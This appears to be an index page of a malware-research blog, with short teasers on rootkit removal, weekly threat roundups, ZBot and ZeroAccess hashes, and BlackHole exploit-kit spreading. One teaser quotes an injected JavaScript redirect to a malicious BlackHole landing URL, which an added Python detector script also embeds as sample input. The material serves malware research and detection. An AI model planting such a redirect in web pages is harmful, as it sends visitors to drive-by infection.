Channel: A blog about rootkits research and the Windows kernel
Browsing all 58 articles

TDL FS dumpers

Kaspersky TDSSKiller: http://support.kaspersky.com/downloads/utils/tdsskiller.exe
ESET TdlFsReader: http://eset.ru/tools/TdlFsReader.exe
TDSSKiller first. First, set the option "Checking TDL FS" to On. Performing...


ZeroAccess detection with the XueTr tool

XueTr is a powerful tool for hidden-code/rootkit detection (available for download from http://www.xuetr.com/download/XueTr.zip). Run it on a machine infected with the latest ZeroAccess rootkit. After we...


Necurs rootkit detection

Detailed information (and droppers too) is available at:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=897
http://www.kernelmode.info/forum/viewtopic.php?f=14&t=1177&p=8933#p8859
Block...


New BlackHole features

I looked at MDL today and suddenly discovered the following: a new method of BlackHole spreading. The JS has the form:
document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';
ISC wrote about that...
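The redirect above is a plain `document.location` assignment injected into a compromised page. The script below is an added example, not code from the blog: it pulls such JavaScript redirects out of page source and flags those whose target has the landing-page shape of the one URL quoted in the post (a `main.php` script with a `page` parameter carrying a 16-hex-digit id). Treating that shape as a BlackHole indicator is an assumption generalised from that single URL; the sample HTML is constructed for the example, with the two non-BlackHole URLs made up.

```python
import re
from urllib.parse import urlparse, parse_qs

# JavaScript redirects of the form seen in the post:
#   document.location='http://...';  window.location.href = "..."; location.replace('...')
REDIRECT_RE = re.compile(
    r"(?:(?:document|window|top|self)\.)?location(?:\.href)?\s*"
    r"(?:=|\.replace\s*\()\s*(['\"])(https?://[^'\"]+)\1",
    re.IGNORECASE,
)

# ASSUMPTION: BlackHole landing pages look like /main.php?page=<16 hex digits>,
# generalised from the single URL quoted in the post above.
BH_PAGE_ID_RE = re.compile(r"^[0-9a-f]{16}$")


def extract_redirects(html: str) -> list[str]:
    """Return every URL assigned to a location object in the given page source."""
    return [m.group(2) for m in REDIRECT_RE.finditer(html)]


def looks_like_blackhole_landing(url: str) -> bool:
    """True if the URL matches the assumed BlackHole landing-page shape."""
    u = urlparse(url)
    if not u.path.lower().endswith("/main.php"):
        return False
    page = parse_qs(u.query).get("page", [])
    return len(page) == 1 and bool(BH_PAGE_ID_RE.match(page[0]))


def scan(html: str) -> list[tuple[str, bool]]:
    """Pair each redirect target with the BlackHole verdict."""
    return [(url, looks_like_blackhole_landing(url)) for url in extract_redirects(html)]


def flagged(html: str) -> list[str]:
    """Only the redirect targets that match the assumed BlackHole shape."""
    return [url for url, hit in scan(html) if hit]


# Constructed sample page: one benign redirect, the injected redirect quoted in
# the post, and a near miss whose page id is not 16 hex digits (example.net is made up).
SAMPLE_HTML = """
<html><body>
<script>window.location.href = "https://example.com/login?next=/home";</script>
<script type="text/javascript">document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';</script>
<script>location.replace('http://example.net/main.php?page=abc');</script>
</body></html>
"""

if __name__ == "__main__":
    for url, hit in scan(SAMPLE_HTML):
        print(("BLACKHOLE " if hit else "          ") + url)
```

Run it over saved copies of suspected injected pages; the regex only catches literal, unobfuscated assignments like the one in the post, so a page that builds the URL with string concatenation or `unescape` has to be deobfuscated first.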


Russian elections - hall of shame

1) On election day. Intermediate results: 146.47% - special wrapping for the pro-Kremlin party.
2) DDoS attacks on social networks and media, such as St. Petersburg Novaya Gazeta, KartaNarusheniy.ru,...


SpyEye removal with the XueTr tool

SpyEye is a well-known trojan that steals private data. Also known as EyeStye (Microsoft) and Pincav (Kaspersky). It can be identified by any anti-rootkit: only user-mode hooks, no driver. The purpose of the hooks is...


DorkBot/NgrBot removal

Worm:Win32/Dorkbot.I is an IRC-based worm (DorkBot family) with backdoor features. Also known as NgrBot and IRCBot. Like SpyEye, it may capture private user data, such as user names and...


Top threats of the last two weeks (20 Dec '11 - 3 Jan '12)

20 Dec '11 - 3 Jan '12
A new wave of Sinowal/Mebroot spreads.
A wave of French ransomware - Trojan Ransom.
At the start of the first week - Winlock/WindowsSecurity.
FakeRean (Rogue:Win32/FakeRean), covers: XP Antispyware...


Top threats of the week 3 Jan '12 - 7 Jan '12

3 Jan '12 - 7 Jan '12
Sinowal/Mebroot.
NgrBot/DorkBot/IRCBot.
Caphaw.A - Backdoor.
Password stealers (ZBot/SpyEye).
Ramnit.
Rogue: FakeRean, Winlock/Ransom, WindowsSecurity.
Cridex.


BlackHole spreads more and more malware

The trend of the last weeks is BlackHole and the many types of malware it spreads. In fact these are mostly password stealers and ransomware, from which attackers get the most profit. So, the most widespread BH...


Top threats of the month, Jan 2012

In the first month of 2012 a lot of various ransomware, fake antiviruses and password stealers were observed. In the first quarter of January there was a new type of ransomware - Reveton....


New ZBot modifications

MD5: B52BD5D6B18A0A46FA062269BE3B639F
SHA1: 104681a106148e47970ac6c31e83009640ed532b
MD5: 376EC224F2931544E1A7C0703085B9DD
SHA1: ed6a50d67e5e44e22c8950395f78102661a1a32e
MD5:...


BlackHole spreads ZeroAccess/Sirefef

Together with Kafeine we observed that the BlackHole group that distributed Carberp in the past now distributes ZeroAccess. All samples had FUD status. A couple of hashes:
MD5: 4f7c964fe7011de17ccbce326591586f
SHA1:...


Community: Microsoft broke the rules in the ZBot takedown

The beginning of the story, in brief:
http://www.anti-malware.ru/forum/index.php?showtopic=21983
Microsoft decided to strike at (disrupt) the infrastructure of the botnet whose bots are based on the original code...


Malware collection and research

Guys, I have been collecting malware over the last few months. If you need information, MD5s or samples for research purposes, leave a message on the post or send a message to my VT profile at...


Bootkits - the survival trend of malware in current conditions

So, briefly, to the point and with the emphasis in the right places. Let us first turn to what Symantec wrote almost a year ago. The article was called Are MBR Infections Back in Fashion? (MBR infection...


Flamer goes ITW

The original CrySys research is very detailed and useful: http://www.crysys.hu/skywiper/skywiper.pdf. The CrySys report was updated with Kaspersky's information about the mssecmgr.ocx structure. Steps to infection:...


ZeroAccess - new steps in evolution

ZeroAccess was updated about a month ago. As we remember, previous versions contained a rootkit with VFS functionality and also a modern self-defence method against AV scanners. It also infected...


Removing the Pushbot worm by hand

This research covers a fresh version of the Pushbot worm - Worm:Win32/Pushbot.VR.
Dropper:
MD5: 3e50b76c0066c314d224f4fd4cbf14d5
SHA1: 8284814c5c5cb0f37fe200b918b65ef89c259a0a
Infects via Facebook spreading...


Interesting malware of the month: trends and hashes

Interesting malware already discussed last month.
1. ZeroAccess/Sirefef was updated, with a cross-platform file-infector feature and shellcode.
SHA1: 23e1f3a819e4e4af58c4a6d5eb489b90ebd7ae8f
MD5:...
